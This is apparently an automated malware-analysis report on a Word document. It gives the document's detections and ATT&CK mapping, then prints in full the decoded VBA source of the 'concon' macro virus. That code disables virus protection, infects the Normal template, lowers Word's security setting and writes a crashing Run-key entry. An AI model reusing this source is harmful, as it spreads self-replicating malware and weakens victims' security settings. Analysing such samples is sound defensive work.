MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a Word document containing a VBA macro with an AutoClose subroutine. This macro attempts to export itself and import it into the Normal template, indicating an attempt to establish persistence. It also attempts to write to the registry Run key with the value 'c:\con\con', likely to execute a second-stage payload.
Heuristics 4
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1966 bytes |
SHA-256: 43d230fe7d1be1336a058c5ef266bbf663c501476efa76ca1133c9ef01a04c27 |
|||
|
Detection
ClamAV:
Doc.Trojan.Concon-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "concon"
Sub AutoClose()
On Error Resume Next
Dim FY, SNP
FY = (Rnd * 0)
SNP = (Rnd * 0)
Options.VirusProtection = FY
Options.SaveNormalPrompt = SNP
Application.EnableCancelKey = wCancelDisabled
Application.DisplayStatusBar = (Rnd * 0)
Application.ScreenUpdating = (Rnd * 0)
Application.DisplayAlerts = wdAlertsNone
CommandBars("Tools").Controls("Macro").Delete
Const Exportf = "c:\boot.386"
Const Ego = "concon"
Set ADoc = ActiveDocument.VBProject.VBComponents
Set NTmp = NormalTemplate.VBProject.VBComponents
ADoc(Ego).Export Exportf
NTmp(Ego).Export Exportf
For I = 1 To NTmp.Count
If NTmp(I).Name = Ego Then NtmpOK = True
Next I
For I = 1 To ADoc.Count
If ADoc(I).Name = Ego Then DocOK = True
Next I
If DocOK = True And NtmpOK = False Then Set Stoj = NormalTemplate.VBProject _
Else: If DocOK = False And NtmpOK = True Then Set Stoj = ActiveDocument.VBProject
Stoj.VBComponents.Import Exportf
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
Call Pay
End Sub
Sub Pay()
Dim Xday, Strn
Xday = Date
Strn = Format(Xday, "d")
If Strn = 31 Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "") = "c:\con\con"
Dim Msg, Style, Title, Response
Msg = "Shutdown all applications and reboot"
Style = vbOK + vbCritical + vbSystemModal
Title = "Error"
Response = MsgBox(Msg, Style, Title)
End If
' (c) Pvx 2000 only for research purposes
' concon exploit virus (word97/2000 compatible) dont distribute
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.